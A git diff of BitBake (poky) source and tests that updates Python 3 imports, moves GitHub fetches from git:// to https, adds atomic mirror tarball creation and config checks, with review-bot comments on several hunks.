diff --git a/poky/bitbake/lib/bb/cookerdata.py b/poky/bitbake/lib/bb/cookerdata.py index 472423fdc8..30727bf2ee 100644 --- a/poky/bitbake/lib/bb/cookerdata.py +++ b/poky/bitbake/lib/bb/cookerdata.py @@ -58,11 +58,14 @@ class ConfigParameters(object): def updateToServer(self, server, environment): options = {} for o in ["abort", "force", "invalidate_stamp", - "verbose", "debug", "dry_run", "dump_signatures", + "debug", "dry_run", "dump_signatures", "debug_domains", "extra_assume_provided", "profile", "prefile", "postfile", "server_timeout"]: options[o] = getattr(self.options, o) + options['build_verbose_shell'] = self.options.verbose + options['build_verbose_stdout'] = self.options.verbose + ret, error = server.runCommand(["updateConfig", options, environment, sys.argv]) if error: raise Exception("Unable to update the server configuration with local parameters: %s" % error) @@ -125,6 +128,8 @@ class CookerConfiguration(object): self.skipsetscene = False self.invalidate_stamp = False self.dump_signatures = [] + self.build_verbose_shell = False + self.build_verbose_stdout = False self.dry_run = False self.tracking = False self.xmlrpcinterface = [] @@ -297,6 +302,8 @@ class CookerDataBuilder(object): multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split() for config in multiconfig: + if config[0].isdigit(): + bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config) mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config) bb.event.fire(bb.event.ConfigParsed(), mcdata) self.mcdata[config] = mcdata @@ -348,6 +355,9 @@ class CookerDataBuilder(object): layers = (data.getVar('BBLAYERS') or "").split() broken_layers = [] + if not layers: + bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition") + data = bb.data.createCopy(data) approved = bb.utils.approved_variables() 
@@ -399,6 +409,8 @@ class CookerDataBuilder(object): if c in collections_tmp: bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c) compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split()) + if compat and not layerseries: + bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c) if compat and not (compat & layerseries): bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)" % (c, " ".join(layerseries), " ".join(compat))) diff --git a/poky/bitbake/lib/bb/data_smart.py b/poky/bitbake/lib/bb/data_smart.py index 61b37cf334..c46d3f0a08 100644 --- a/poky/bitbake/lib/bb/data_smart.py +++ b/poky/bitbake/lib/bb/data_smart.py @@ -17,7 +17,7 @@ BitBake build tools. # Based on functions from the base bb module, Copyright 2003 Holger Schurig import copy, re, sys, traceback -from collections import MutableMapping +from collections.abc import MutableMapping import logging import hashlib import bb, bb.codeparser @@ -403,7 +403,7 @@ class DataSmart(MutableMapping): s = __expand_python_regexp__.sub(varparse.python_sub, s) except SyntaxError as e: # Likely unmatched brackets, just don't expand the expression - if e.msg != "EOL while scanning string literal": + if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"): raise if s == olds: break @@ -411,6 +411,8 @@ class DataSmart(MutableMapping): raise except bb.parse.SkipRecipe: raise + except bb.BBHandledException: + raise except Exception as exc: tb = sys.exc_info()[2] raise ExpansionError(varname, s, exc).with_traceback(tb) from exc diff --git a/poky/bitbake/lib/bb/event.py b/poky/bitbake/lib/bb/event.py index d1359f0100..cb0b3b3345 100644 --- a/poky/bitbake/lib/bb/event.py +++ b/poky/bitbake/lib/bb/event.py 
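Review bot: The `SyntaxError` filter in data_smart.py (@@ -403) now depends on two interpreter message texts, `"EOL while scanning string literal"` and the prefix `"unterminated string literal"`, and will silently stop matching if CPython rewords the message again. A comment naming the origin of each string would make the next breakage quick to diagnose, for example `# Python < 3.10 says "EOL while scanning string literal"; 3.10+ says "unterminated string literal (detected at line N)"`. The surrounding expansion loop starts and ends outside the hunk.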
@@ -10,17 +10,17 @@ BitBake build tools. # SPDX-License-Identifier: GPL-2.0-only # -import sys -import pickle -import logging -import atexit -import traceback import ast +import atexit +import collections +import logging +import pickle +import sys import threading +import traceback -import bb.utils -import bb.compat import bb.exceptions +import bb.utils # This is the pid for which we should generate the event. This is set when # the runqueue forks off. @@ -56,7 +56,7 @@ def set_class_handlers(h): _handlers = h def clean_class_handlers(): - return bb.compat.OrderedDict() + return collections.OrderedDict() # Internal _handlers = clean_class_handlers() diff --git a/poky/bitbake/lib/bb/fetch2/git.py b/poky/bitbake/lib/bb/fetch2/git.py index 112b833f87..f6f6b63a74 100644 --- a/poky/bitbake/lib/bb/fetch2/git.py +++ b/poky/bitbake/lib/bb/fetch2/git.py @@ -67,6 +67,7 @@ import subprocess import tempfile import bb import bb.progress +from contextlib import contextmanager from bb.fetch2 import FetchMethod from bb.fetch2 import runfetchcmd from bb.fetch2 import logger @@ -140,6 +141,10 @@ class Git(FetchMethod): ud.proto = 'file' else: ud.proto = "git" + if ud.host == "github.com" and ud.proto == "git": + # github stopped supporting git protocol + # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git + ud.proto = "https" if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'): raise bb.fetch2.ParameterError("Invalid protocol type", ud.url) 
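Review bot: The github.com branch added to class `Git` (git.py, @@ -141) silently rewrites `ud.proto` from `git` to `https`, so a recipe keeps its stale `protocol=` setting with nothing in the log to prompt a fix. A line such as `logger.debug("github.com no longer serves git://, fetching %s over https" % ud.url)` would make the substitution visible; `logger` is already imported from `bb.fetch2` in this file. The test `ud.host == "github.com"` is also an exact, case-sensitive match, so unless `ud.host` is normalised elsewhere a URL written as `GitHub.com` would still take the unauthenticated `git` path; `ud.host.lower() == "github.com"` closes that gap.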
@@ -408,6 +413,20 @@ class Git(FetchMethod): bb.utils.remove(tmpdir, recurse=True) def build_mirror_data(self, ud, d): + + # Create as a temp file and move atomically into position to avoid races + @contextmanager + def create_atomic(filename): + fd, tfile = tempfile.mkstemp(dir=os.path.dirname(filename)) + try: + yield tfile + umask = os.umask(0o666) + os.umask(umask) + os.chmod(tfile, (0o666 & ~umask)) + os.rename(tfile, filename) + finally: + os.close(fd) + if ud.shallow and ud.write_shallow_tarballs: if not os.path.exists(ud.fullshallow): if os.path.islink(ud.fullshallow): @@ -418,7 +437,8 @@ class Git(FetchMethod): self.clone_shallow_local(ud, shallowclone, d) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullshallow, d, workdir=shallowclone) + with create_atomic(ud.fullshallow) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=shallowclone) runfetchcmd("touch %s.done" % ud.fullshallow, d) finally: bb.utils.remove(tempdir, recurse=True) @@ -427,7 +447,8 @@ class Git(FetchMethod): os.unlink(ud.fullmirror) logger.info("Creating tarball of git repository") - runfetchcmd("tar -czf %s ." % ud.fullmirror, d, workdir=ud.clonedir) + with create_atomic(ud.fullmirror) as tfile: + runfetchcmd("tar -czf %s ." % tfile, d, workdir=ud.clonedir) runfetchcmd("touch %s.done" % ud.fullmirror, d) def clone_shallow_local(self, ud, dest, d): diff --git a/poky/bitbake/lib/bb/fetch2/wget.py b/poky/bitbake/lib/bb/fetch2/wget.py index f7d1de26b7..5676d3fd27 100644 --- a/poky/bitbake/lib/bb/fetch2/wget.py +++ b/poky/bitbake/lib/bb/fetch2/wget.py @@ -319,7 +319,7 @@ class Wget(FetchMethod): except (TypeError, ImportError, IOError, netrc.NetrcParseError): pass - with opener.open(r) as response: + with opener.open(r, timeout=30) as response: pass except urllib.error.URLError as e: if try_again: diff --git a/poky/bitbake/lib/bb/msg.py b/poky/bitbake/lib/bb/msg.py index 2d88c4e72d..1b1a23bb50 100644 --- a/poky/bitbake/lib/bb/msg.py 
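Review bot: `create_atomic` never removes the file it got from `tempfile.mkstemp()` when the body of the `with` block raises; the `finally` clause only closes the descriptor, so a failed `tar -czf` leaves a partial tarball with a random name in the download directory on every retry. Adding a handler between the `try` body and `finally` covers this: `except Exception:` / `bb.utils.remove(tfile)` / `raise`. The `os.umask(0o666)` followed by `os.umask(umask)` pair used to read the current mask changes it process-wide for a moment, which deserves a one-line comment, since another thread creating files in that window would get the wrong mode. The same helper is used by both later hunks in `build_mirror_data`, so the fix applies to the shallow and the full mirror tarball alike.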
+++ b/poky/bitbake/lib/bb/msg.py @@ -146,18 +146,12 @@ class LogFilterLTLevel(logging.Filter): # loggerDefaultLogLevel = BBLogFormatter.NOTE -loggerDefaultVerbose = False -loggerVerboseLogs = False loggerDefaultDomains = {} def init_msgconfig(verbose, debug, debug_domains=None): """ Set default verbosity and debug levels config the logger """ - bb.msg.loggerDefaultVerbose = verbose - if verbose: - bb.msg.loggerVerboseLogs = True - if debug: bb.msg.loggerDefaultLogLevel = BBLogFormatter.DEBUG - debug + 1 elif verbose: diff --git a/poky/bitbake/lib/bb/persist_data.py b/poky/bitbake/lib/bb/persist_data.py index 7357ab2d44..56c983f816 100644 --- a/poky/bitbake/lib/bb/persist_data.py +++ b/poky/bitbake/lib/bb/persist_data.py @@ -12,14 +12,15 @@ currently, providing a key/value store accessed by 'domain'. # import collections +import collections.abc +import contextlib +import functools import logging import os.path +import sqlite3 import sys import warnings -from bb.compat import total_ordering -from collections import Mapping -import sqlite3 -import contextlib +from collections.abc import Mapping sqlversion = sqlite3.sqlite_version_info if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): @@ -28,8 +29,8 @@ if sqlversion[0] < 3 or (sqlversion[0] == 3 and sqlversion[1] < 3): logger = logging.getLogger("BitBake.PersistData") -@total_ordering -class SQLTable(collections.MutableMapping): +@functools.total_ordering +class SQLTable(collections.abc.MutableMapping): class _Decorators(object): @staticmethod def retry(*, reconnect=True): diff --git a/poky/bitbake/lib/bb/process.py b/poky/bitbake/lib/bb/process.py index 2dc472a86f..24c588e533 100644 --- a/poky/bitbake/lib/bb/process.py +++ b/poky/bitbake/lib/bb/process.py 
@@ -179,5 +179,8 @@ def run(cmd, input=None, log=None, extrafiles=None, **options): stderr = stderr.decode("utf-8") if pipe.returncode != 0: + if log: + # Don't duplicate the output in the exception if logging it + raise ExecutionError(cmd, pipe.returncode, None, None) raise ExecutionError(cmd, pipe.returncode, stdout, stderr) return stdout, stderr diff --git a/poky/bitbake/lib/bb/runqueue.py b/poky/bitbake/lib/bb/runqueue.py index 2d35d478a4..a513b0983b 100644 --- a/poky/bitbake/lib/bb/runqueue.py +++ b/poky/bitbake/lib/bb/runqueue.py @@ -1256,8 +1256,8 @@ class RunQueue: "fakerootnoenv" : self.rqdata.dataCaches[mc].fakerootnoenv, "sigdata" : bb.parse.siggen.get_taskdata(), "logdefaultlevel" : bb.msg.loggerDefaultLogLevel, - "logdefaultverbose" : bb.msg.loggerDefaultVerbose, - "logdefaultverboselogs" : bb.msg.loggerVerboseLogs, + "build_verbose_shell" : self.cooker.configuration.build_verbose_shell, + "build_verbose_stdout" : self.cooker.configuration.build_verbose_stdout, "logdefaultdomain" : bb.msg.loggerDefaultDomains, "prhost" : self.cooker.prhost, "buildname" : self.cfgData.getVar("BUILDNAME"), diff --git a/poky/bitbake/lib/bb/server/process.py b/poky/bitbake/lib/bb/server/process.py index b66fbe0acd..7b13576274 100644 --- a/poky/bitbake/lib/bb/server/process.py +++ b/poky/bitbake/lib/bb/server/process.py @@ -152,7 +152,8 @@ class ProcessServer(multiprocessing.Process): conn = newconnections.pop(-1) fds.append(conn) self.controllersock = conn - elif self.timeout is None and not ready: + + elif not self.timeout and not ready: print("No timeout, exiting.") self.quit = True 
@@ -347,7 +348,12 @@ class ServerCommunicator(): logger.info("No reply from server in 30s") if not self.recv.poll(30): raise ProcessTimeout("Timeout while waiting for a reply from the bitbake server (60s)") - return self.recv.get() + ret, exc = self.recv.get() + # Should probably turn all exceptions in exc back into exceptions? + # For now, at least handle BBHandledException + if exc and "BBHandledException" in exc: + raise bb.BBHandledException() + return ret, exc def updateFeatureSet(self, featureset): _, error = self.runCommand(["setFeatures", featureset]) @@ -586,7 +592,7 @@ class BBUIEventQueue: self.reader = ConnectionReader(readfd) self.t = threading.Thread() - self.t.setDaemon(True) + self.t.daemon = True self.t.run = self.startCallbackHandler self.t.start() diff --git a/poky/bitbake/lib/bb/tests/event.py b/poky/bitbake/lib/bb/tests/event.py index 9229b63d47..9ca7e9bc8e 100644 --- a/poky/bitbake/lib/bb/tests/event.py +++ b/poky/bitbake/lib/bb/tests/event.py @@ -6,17 +6,18 @@ # SPDX-License-Identifier: GPL-2.0-only # -import unittest -import bb -import logging -import bb.compat -import bb.event +import collections import importlib +import logging +import pickle import threading import time -import pickle +import unittest from unittest.mock import Mock from unittest.mock import call + +import bb +import bb.event from bb.msg import BBLogFormatter @@ -75,7 +76,7 @@ class EventHandlingTest(unittest.TestCase): def _create_test_handlers(self): """ Method used to create a test handler ordered dictionary """ - test_handlers = bb.compat.OrderedDict() + test_handlers = collections.OrderedDict() test_handlers["handler1"] = self._test_process.handler1 test_handlers["handler2"] = self._test_process.handler2 return test_handlers 
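Review bot: `"BBHandledException" in exc` in `runCommand` is a substring test on the error text returned by the server, so any failure whose message or traceback merely mentions that name is re-raised as a bare `bb.BBHandledException()` and its original details are dropped for the caller. If the text is a formatted traceback (not visible in this hunk), testing only its last line would be tighter; otherwise the assumption should at least be written down, e.g. `# exc is server-side error text; substring match may also hit unrelated errors that mention the name`. The existing comment already admits the conversion is incomplete, so a structured marker from the server would be the cleaner long-term shape.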
@@ -96,7 +97,7 @@ class EventHandlingTest(unittest.TestCase): def test_clean_class_handlers(self): """ Test clean_class_handlers method """ - cleanDict = bb.compat.OrderedDict() + cleanDict = collections.OrderedDict() self.assertEqual(cleanDict, bb.event.clean_class_handlers()) diff --git a/poky/bitbake/lib/bb/tests/fetch.py b/poky/bitbake/lib/bb/tests/fetch.py index 6300f563f2..44dc0945a0 100644 --- a/poky/bitbake/lib/bb/tests/fetch.py +++ b/poky/bitbake/lib/bb/tests/fetch.py @@ -472,7 +472,7 @@ class GitDownloadDirectoryNamingTest(FetcherTest): super(GitDownloadDirectoryNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_dir = "git.openembedded.org.bitbake" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_dir = "github.com.openembedded.bitbake.git" self.d.setVar('SRCREV', '82ea737a0b42a8b53e11c9cde141e9e9c0bd8c40') @@ -520,7 +520,7 @@ class TarballNamingTest(FetcherTest): super(TarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "git2_git.openembedded.org.bitbake.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "git2_github.com.openembedded.bitbake.git.tar.gz" self.d.setVar('BB_GENERATE_MIRROR_TARBALLS', '1') @@ -554,7 +554,7 @@ class GitShallowTarballNamingTest(FetcherTest): super(GitShallowTarballNamingTest, self).setUp() self.recipe_url = "git://git.openembedded.org/bitbake" self.recipe_tarball = "gitshallow_git.openembedded.org.bitbake_82ea737-1_master.tar.gz" - self.mirror_url = "git://github.com/openembedded/bitbake.git" + self.mirror_url = "git://github.com/openembedded/bitbake.git;protocol=https" self.mirror_tarball = "gitshallow_github.com.openembedded.bitbake.git_82ea737-1_master.tar.gz" self.d.setVar('BB_GIT_SHALLOW', '1') 
@@ -921,7 +921,7 @@ class FetcherNetworkTest(FetcherTest): def test_git_submodule_dbus_broker(self): # The following external repositories have show failures in fetch and unpack operations # We want to avoid regressions! - url = "gitsm://github.com/bus1/dbus-broker;protocol=git;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" + url = "gitsm://github.com/bus1/dbus-broker;protocol=https;rev=fc874afa0992d0c75ec25acb43d344679f0ee7d2;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -937,7 +937,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_CLI11(self): - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=bd4dc911847d0cde7a6b41dfa626a85aab213baf;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -952,12 +952,12 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_update_CLI11(self): """ Prevent regression on update detection not finding missing submodule, or modules without needed commits """ - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=cf6a99fa69aaefe477cc52e3ef4a7d2d7fa40714;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # CLI11 that pulls in a newer nlohmann-json - url = "gitsm://github.com/CLIUtils/CLI11;protocol=git;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca" + url = "gitsm://github.com/CLIUtils/CLI11;protocol=https;rev=49ac989a9527ee9bb496de9ded7b4872c2e0e5ca;branch=main" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted 
@@ -971,7 +971,7 @@ class FetcherNetworkTest(FetcherTest): @skipIfNoNetwork() def test_git_submodule_aktualizr(self): - url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=git;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" + url = "gitsm://github.com/advancedtelematic/aktualizr;branch=master;protocol=https;rev=d00d1a04cc2366d1a5f143b84b9f507f8bd32c44" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -991,7 +991,7 @@ class FetcherNetworkTest(FetcherTest): """ Prevent regression on deeply nested submodules not being checked out properly, even though they were fetched. """ # This repository also has submodules where the module (name), path and url do not align - url = "gitsm://github.com/azure/iotedge.git;protocol=git;rev=d76e0316c6f324345d77c48a83ce836d09392699" + url = "gitsm://github.com/azure/iotedge.git;protocol=https;rev=d76e0316c6f324345d77c48a83ce836d09392699" fetcher = bb.fetch.Fetch([url], self.d) fetcher.download() # Previous cwd has been deleted @@ -1049,7 +1049,7 @@ class SVNTest(FetcherTest): bb.process.run("svn co %s svnfetch_co" % self.repo_url, cwd=self.tempdir) # Github will emulate SVN. Use this to check if we're downloding... - bb.process.run("svn propset svn:externals 'bitbake svn://vcs.pcre.org/pcre2/code' .", + bb.process.run("svn propset svn:externals 'bitbake https://github.com/PhilipHazel/pcre2.git' .", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) bb.process.run("svn commit --non-interactive -m 'Add external'", cwd=os.path.join(self.tempdir, 'svnfetch_co', 'trunk')) 
@@ -1167,7 +1167,7 @@ class FetchLatestVersionTest(FetcherTest): test_git_uris = { # version pattern "X.Y.Z" - ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") + ("mx-1.0", "git://github.com/clutter-project/mx.git;branch=mx-1.4;protocol=https", "9b1db6b8060bd00b121a692f942404a24ae2960f", "") : "1.99.4", # version pattern "vX.Y" # mirror of git.infradead.org since network issues interfered with testing @@ -1178,7 +1178,7 @@ class FetchLatestVersionTest(FetcherTest): ("presentproto", "git://git.yoctoproject.org/bbfetchtests-presentproto", "24f3a56e541b0a9e6c6ee76081f441221a120ef9", "") : "1.0", # version pattern "pkg_name-vX.Y.Z" - ("dtc", "git://git.qemu.org/dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") + ("dtc", "git://git.yoctoproject.org/bbfetchtests-dtc.git", "65cc4d2748a2c2e6f27f1cf39e07a5dbabd80ebf", "") : "1.4.0", # combination version pattern ("sysprof", "git://gitlab.gnome.org/GNOME/sysprof.git;protocol=https", "cd44ee6644c3641507fb53b8a2a69137f2971219", "") 
@@ -1190,13 +1190,13 @@ class FetchLatestVersionTest(FetcherTest): : "20120614", # packages with a valid UPSTREAM_CHECK_GITTAGREGEX # mirror of git://anongit.freedesktop.org/xorg/driver/xf86-video-omap since network issues interfered with testing - ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", "(?P<pver>(\d+\.(\d\.?)*))") + ("xf86-video-omap", "git://git.yoctoproject.org/bbfetchtests-xf86-video-omap", "ae0394e687f1a77e966cf72f895da91840dffb8f", r"(?P<pver>(\d+\.(\d\.?)*))") : "0.4.3", - ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", "(?P<pver>(([0-9][\.|_]?)+[0-9]))") + ("build-appliance-image", "git://git.yoctoproject.org/poky", "b37dd451a52622d5b570183a81583cc34c2ff555", r"(?P<pver>(([0-9][\.|_]?)+[0-9]))") : "11.0.0", - ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot", "cd437ecbd8986c894442f8fce1e0061e20f04dee", "chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") + ("chkconfig-alternatives-native", "git://github.com/kergoth/chkconfig;branch=sysroot;protocol=https", "cd437ecbd8986c894442f8fce1e0061e20f04dee", r"chkconfig\-(?P<pver>((\d+[\.\-_]*)+))") : "1.3.59", - ("remake", "git://github.com/rocky/remake.git", "f05508e521987c8494c92d9c2871aec46307d51d", "(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") + ("remake", "git://github.com/rocky/remake.git;protocol=https", "f05508e521987c8494c92d9c2871aec46307d51d", r"(?P<pver>(\d+\.(\d+\.)*\d*(\+dbg\d+(\.\d+)*)*))") : "3.82+dbg0.9", } 
@@ -1236,11 +1236,11 @@ class FetchLatestVersionTest(FetcherTest): # # http://www.cups.org/software/1.7.2/cups-1.7.2-source.tar.bz2 # https://github.com/apple/cups/releases - ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", "(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") + ("cups", "/software/1.7.2/cups-1.7.2-source.tar.bz2", "/apple/cups/releases", r"(?P<name>cups\-)(?P<pver>((\d+[\.\-_]*)+))\-source\.tar\.gz") : "2.0.0", # http://download.oracle.com/berkeley-db/db-5.3.21.tar.gz # http://ftp.debian.org/debian/pool/main/d/db5.3/ - ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", "(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") + ("db", "/berkeley-db/db-5.3.21.tar.gz", "/debian/pool/main/d/db5.3/", r"(?P<name>db5\.3_)(?P<pver>\d+(\.\d+)+).+\.orig\.tar\.xz") : "5.3.10", } @@ -1290,9 +1290,6 @@ class FetchCheckStatusTest(FetcherTest): "http://downloads.yoctoproject.org/releases/opkg/opkg-0.1.7.tar.gz", "http://downloads.yoctoproject.org/releases/opkg/opkg-0.3.0.tar.gz", "ftp://sourceware.org/pub/libffi/libffi-1.20.tar.gz", - "http://ftp.gnu.org/gnu/autoconf/autoconf-2.60.tar.gz", - "https://ftp.gnu.org/gnu/chess/gnuchess-5.08.tar.gz", - "https://ftp.gnu.org/gnu/gmp/gmp-4.0.tar.gz", # GitHub releases are hosted on Amazon S3, which doesn't support HEAD "https://github.com/kergoth/tslib/releases/download/1.1/tslib-1.1.tar.xz" ] @@ -1983,7 +1980,7 @@ class GitShallowTest(FetcherTest): @skipIfNoNetwork() def test_bitbake(self): - self.git('remote add --mirror=fetch origin git://github.com/openembedded/bitbake', cwd=self.srcdir) + self.git('remote add --mirror=fetch origin https://github.com/openembedded/bitbake', cwd=self.srcdir) self.git('config core.bare true', cwd=self.srcdir) self.git('fetch', cwd=self.srcdir) diff --git a/poky/bitbake/lib/bb/tinfoil.py b/poky/bitbake/lib/bb/tinfoil.py index 8c9b6b8ca5..ae69038952 100644 --- a/poky/bitbake/lib/bb/tinfoil.py +++ b/poky/bitbake/lib/bb/tinfoil.py 
@@ -465,7 +465,16 @@ class Tinfoil: commandline = [command] if params: commandline.extend(params) - result = self.server_connection.connection.runCommand(commandline) + try: + result = self.server_connection.connection.runCommand(commandline) + finally: + while True: + event = self.wait_event() + if not event: + break + if isinstance(event, logging.LogRecord): + if event.taskpid == 0 or event.levelno > logging.INFO: + self.logger.handle(event) if result[1]: raise TinfoilCommandFailed(result[1]) return result[0] diff --git a/poky/bitbake/lib/bb/ui/knotty.py b/poky/bitbake/lib/bb/ui/knotty.py index 87e873d644..e70c246400 100644 --- a/poky/bitbake/lib/bb/ui/knotty.py +++ b/poky/bitbake/lib/bb/ui/knotty.py 
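Review bot: The drain loop in the new `finally` block reads `event.taskpid` on every `logging.LogRecord`, and an exception raised inside `finally` replaces whatever `runCommand` raised. Whether every record arriving through `wait_event()` carries `taskpid` is not visible in this hunk; if one does not, the caller sees an AttributeError instead of the real command failure. `if getattr(event, "taskpid", 0) == 0 or event.levelno > logging.INFO:` keeps the filter and removes that failure mode. The method body starts outside the hunk.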
@@ -380,14 +380,27 @@ _evt_list = [ "bb.runqueue.runQueueExitWait", "bb.event.LogExecTTY", "logging.Lo "bb.event.BuildBase", "bb.build.TaskStarted", "bb.build.TaskSucceeded", "bb.build.TaskFailedSilent", "bb.build.TaskProgress", "bb.event.ProcessStarted", "bb.event.ProcessProgress", "bb.event.ProcessFinished"] +def drain_events_errorhandling(eventHandler): + # We don't have logging setup, we do need to show any events we see before exiting + event = True + logger = bb.msg.logger_create('bitbake', sys.stdout) + while event: + event = eventHandler.waitEvent(0) + if isinstance(event, logging.LogRecord): + logger.handle(event) + def main(server, eventHandler, params, tf = TerminalFilter): - if not params.observe_only: - params.updateToServer(server, os.environ.copy()) + try: + if not params.observe_only: + params.updateToServer(server, os.environ.copy()) - includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) + includelogs, loglines, consolelogfile, logconfigfile = _log_settings_from_server(server, params.observe_only) - loglevel, _ = bb.msg.constructLogOptions() + loglevel, _ = bb.msg.constructLogOptions() + except bb.BBHandledException: + drain_events_errorhandling(eventHandler) + return 1 if params.options.quiet == 0: console_loglevel = loglevel diff --git a/poky/bitbake/lib/bb/ui/taskexp.py b/poky/bitbake/lib/bb/ui/taskexp.py index 2b246710ca..c00eaf6638 100644 --- a/poky/bitbake/lib/bb/ui/taskexp.py +++ b/poky/bitbake/lib/bb/ui/taskexp.py @@ -8,6 +8,7 @@ # import sys +import traceback try: import gi @@ -196,6 +197,7 @@ def main(server, eventHandler, params): gtkgui.start() try: + params.updateToServer(server, os.environ.copy()) params.updateFromServer(server) cmdline = params.parseActions() if not cmdline: 
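Review bot: The line added to `main` in taskexp.py calls `os.environ.copy()`, but `os` is not among the imports visible in this file's first hunk, which shows only `import sys` and the new `import traceback` ahead of the `try: import gi` block. If the module does not import `os` further down, the call raises NameError at startup. Adding `import os` next to `import sys` settles it either way. The call also passes the whole client environment to the server, which deserves a short comment stating that this is intended.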
@@ -218,6 +220,9 @@ def main(server, eventHandler, params): except client.Fault as x: print("XMLRPC Fault getting commandline:\n %s" % x) return + except Exception as e: + print("Exception in startup:\n %s" % traceback.format_exc()) + return if gtkthread.quit.isSet(): return diff --git a/poky/bitbake/lib/bb/utils.py b/poky/bitbake/lib/bb/utils.py index 5f5767c1da..fab16ffc58 100644 --- a/poky/bitbake/lib/bb/utils.py +++ b/poky/bitbake/lib/bb/utils.py @@ -16,7 +16,8 @@ import bb.msg import multiprocessing import fcntl import importlib -from importlib import machinery +import importlib.machinery +import importlib.util import itertools import subprocess import glob @@ -1584,7 +1585,9 @@ def load_plugins(logger, plugins, pluginpath): logger.debug(1, 'Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: - return spec.loader.load_module() + mod = importlib.util.module_from_spec(spec) + spec.loader.exec_module(mod) + return mod logger.debug(1, 'Loading plugins from %s...' % pluginpath) diff --git a/poky/bitbake/lib/bblayers/action.py b/poky/bitbake/lib/bblayers/action.py index d6459d6617..d2f9c1bbde 100644 --- a/poky/bitbake/lib/bblayers/action.py +++ b/poky/bitbake/lib/bblayers/action.py @@ -50,10 +50,10 @@ class ActionPlugin(LayerPlugin): if not (args.force or notadded): try: self.tinfoil.run_command('parseConfiguration') - except bb.tinfoil.TinfoilUIException: + except (bb.tinfoil.TinfoilUIException, bb.BBHandledException): # Restore the back up copy of bblayers.conf shutil.copy2(backup, bblayers_conf) - bb.fatal("Parse failure with the specified layer added") + bb.fatal("Parse failure with the specified layer added, aborting.") else: for item in notadded: sys.stderr.write("Specified layer %s is already in BBLAYERS\n" % item) diff --git a/poky/bitbake/lib/bblayers/query.py b/poky/bitbake/lib/bblayers/query.py index e2cc310532..652a3acce0 100644 --- a/poky/bitbake/lib/bblayers/query.py 
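Review bot: In `load_plugins`, the replacement `importlib.util.module_from_spec(spec)` plus `spec.loader.exec_module(mod)` does not register the module in `sys.modules`, which the removed `spec.loader.load_module()` did. A plugin that is later imported by name, or that is loaded twice, will now be executed again and yield a second module object with separate state. If the old behaviour is wanted, add `sys.modules[spec.name] = mod` before the `exec_module` call (assuming `sys` is already imported in utils.py, which this hunk does not show); if not, a comment saying the module is intentionally left unregistered would help the next reader. The enclosing function continues outside the hunk.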
